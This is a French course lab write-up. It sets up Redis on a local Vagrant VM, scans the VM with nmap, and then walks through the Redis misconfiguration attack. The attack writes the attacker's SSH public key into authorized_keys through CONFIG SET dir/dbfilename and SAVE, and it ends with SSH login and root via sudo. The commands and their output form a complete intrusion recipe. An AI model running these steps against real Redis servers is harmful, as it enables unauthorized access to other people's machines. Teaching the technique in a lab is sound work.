# Redis misconfiguration

Pendant le cours, j'avais setup un serveur en ligne qui était attaquable pour ceux qui m'avaient filé leurs clés SSH. Pour cette suggestion de correction, on va juste setup une machine virtuelle en local que l'on va attaquer.

<!-- vim-markdown-toc GitLab -->

* [Setup](#setup)
* [Footprinting](#footprinting)
* [Redis misconfiguration attack](#redis-misconfiguration-attack)

<!-- vim-markdown-toc -->

## Setup

> Pendant les cours, ces étapes avaient réalisées sur le serveur à attaquer, avant que vuos l'attaquiez. Je vous montre le setup pour plus de clarté et de compréhension. C'est une install classique de Redis, dernière version, sans "trous" particuliers dans la conf. Juste la conf par défaut.

**Setup redis database :**

```bash
# Go in redis dir
$ cd redis # this directory

# Bring up the machine
$ vagrant up
$ vagrant ssh

# From inside the VM install Redis
# We use the official documentation ton install latest Redis version
$ sudo su - # use root user to setup Redis
$ yum install -y gcc make # installs gcc, Redis needs to be compiled from sources
$ wget http://download.redis.io/redis-stable.tar.gz
$ tar xvzf redis-stable.tar.gz
$ cd redis-stable
$ make MALLOC=libc  
$ make install

# By default, Redis only accepts connections from localhost. We need to specify another address for clients to connect.
$ cp redis.conf /etc
$ vim /etc/redis.conf

# Les modfications effectuées :
$ cat /etc/redis.conf | grep 10.100.100.12
bind 10.100.100.12           # écoute sur une IP spécifique
$ cat /etc/redis.conf | grep 127.0.0.1
# bind 127.0.0.1 ::1         # pas d'écoute sur localhost

# Création d'une unité systemd pour administrer simplement Redis
[vagrant@localhost ~]$ sudo systemctl cat redis
# /etc/systemd/system/redis.service
[Unit]
Description=Redis server

[Service]
# Enforce security : all files created by Redis are 0600
UMask=0077
# Use an applicative user, no root
User=vagrant

# Command used to start Redis server
ExecStart=/usr/local/bin/redis-server /etc/redis.conf

[Install]
WantedBy=multi-user.target

# On recharge les unités systemd
$ sudo systemctl daemon-reload
# On démarre Redis
$ systemctl start redis
```

**Test depuis l'attaquant :**

```bash
# Connexion à un terminal Redis
$ redis-cli -h 10.100.100.12
10.100.100.12:6379> keys *
(empty list or set)
```

## Footprinting

```bash
# Depuis la machine attaquante
$ sudo nmap -sS -A 10.100.100.12 -p 1-10000

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 12:57 CEST
Nmap scan report for 10.100.100.12
Host is up (0.00077s latency).
Not shown: 9997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 86:00:2f:38:fe:47:84:46:19:e8:fb:b7:bf:61:85:34 (RSA)
|   256 d1:db:59:93:b0:ab:71:b7:bb:ad:ee:6e:6e:42:e6:06 (ECDSA)
|_  256 a6:db:c1:c0:e4:5f:af:90:b6:b7:d5:9b:74:53:61:c0 (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
6379/tcp open  redis   Redis key-value store 5.0.8
MAC Address: 08:00:27:5C:4C:B7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 10.100.100.12

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
```

La commande `nmap` nous indique entre autres :
* on a à faire à un Linux 3.x ou 4.x (c'est en réalité un 3.10)
* au moins 3 ports sont ouverts :
  * 22/tcp : OpenSSH7.4
  * 111/tcp et 111/udp: rpcbind2-4
  * 6379/tcp : Redis 5.0.8 (port par défaut de Redis)
* les premiers octets de la MAC address nous indique que c'est une VM VirtualBox

## Redis misconfiguration attack

L'attaque repose sur deux choses :
* coniguration par défaut avec un login possible en "anonyme"
* le mécanisme de backup de Redis
  * on peut, depuis un client Redis, effectuer un dump de toutes les données contenues dans la DB redis
  * on peut choisir le nom et le path de ce dump

Principe de l'attaque :
* l'attaquant génère une paire de clés SSH
* il se co en anonyme à la base
* il crée une clé Redis qui contient sa clé publique SSH
* changement du path du dump pour le `.ssh/` du homedir d'un utilisateur de la machine
* changement du nom du dump pour `authorized_keys`
* lancement du dump

Une fois ceci effectué, on a un fichier `<HOME_DIR>/.ssh/authorized_keys` qui contient la clé publique de l'attaquant.  
Bah y'a plus qu'à se connecter :)

---

Depuis l'attaquant :
```bash
$ ssh-keygen -t rsa # génération de clés SSH

# Récupération de la clé publique entourée par des retours à la ligne
# Nécessaire pour le bon fonctionnement de l'attaque
$ (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > pubkey 

# Création de la clé dans la DB Redis
## La clé sera "whatever"
## Sa valeur sera notre clé publique SSH
$ cat pubkey | redis-cli -h 10.100.100.12 -x set whatever

# Connexion au Redis et vérification
$ redis-cli -h 10.100.100.12

# On liste toutes les clés
10.100.100.12:6379> keys *
1) "whatever"

# Récupération de la valeur de la clé whatever 
10.100.100.12:6379> get whatever
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQClIbguv1tMXre8prPRL+0CsFW9EGGbQVt4uzhFE55TtOcGgRvoK6Kea0LQai8SY+ppFA8MFzh+xHOxwJOUYq28+UWP7wOm1NPdcD2LjfCZLDj2sApBRSwBw1ZRMhzOMxEodGlppFhS4f3NWfhizJTyz/IhE5VICq/h48ezftFvpMJvWYiJ8C/TcdwGSF8BUvWJZhxj6qSQ7KsXBh2bR2rxxqZSKSVTmukC8zM5CpNYV5dKALtlg1b7w94PmxOX7ipmXgrsh65NhNDAryK1C6hvJIp8xyvKAgE8HN+7EBF02XgG0r5F1F06/zhVkYyUfafHF12j1d7RU2QIUSnRnZM3lYTFw0F/h2k+d/XsPd929Fk0i+cqhuViNUkxtiLqCdLuMkaNvN8pru68tgX7ofeatT4UbfegrFRdRYGSUBF/Y8hvgfpYzKnzpMJtGwM8vk7kb8NpUg7u/KZz0HwR/ExtL5PJwHncEH0KJowisZ72oZeoA2XE9+QmA0C0+ZA0ZdTRF8WGxFx4DnmeLQcu+ZVO2J8nei8eXuexohezAGMcy4pFxkCpyFaeBXMyT1SNVMYTMQDdAIeFgb/bAZ+IS18p5uA6KyzrA0oZfoxgZ1KvT6/4f99reAUc4n1amvBXEbM9nh/WIDZGAKylmPcxE7Yne0Tf2YvVDZee7LvKJfgJpw== \n\n\n\n"

# Empoisonnement de la conf, dump pour déposer la clé publique
## On utilise /home/vagrant/.ssh car c'est le user "vagrant" qui a lancé le serveur
10.100.100.12:6379> config set dir /home/vagrant/.ssh
OK
10.100.100.12:6379> config set dbfilename "authorized_keys"
OK
10.100.100.12:6379> save
OK
10.100.100.12:6379> exit

# Connexion au serveur Redis
$ ssh vagrant@10.100.100.12
Last login: Wed Apr  8 10:39:40 2020 from 10.0.2.2
[vagrant@localhost ~]$ sudo whoami
root  # boom
```
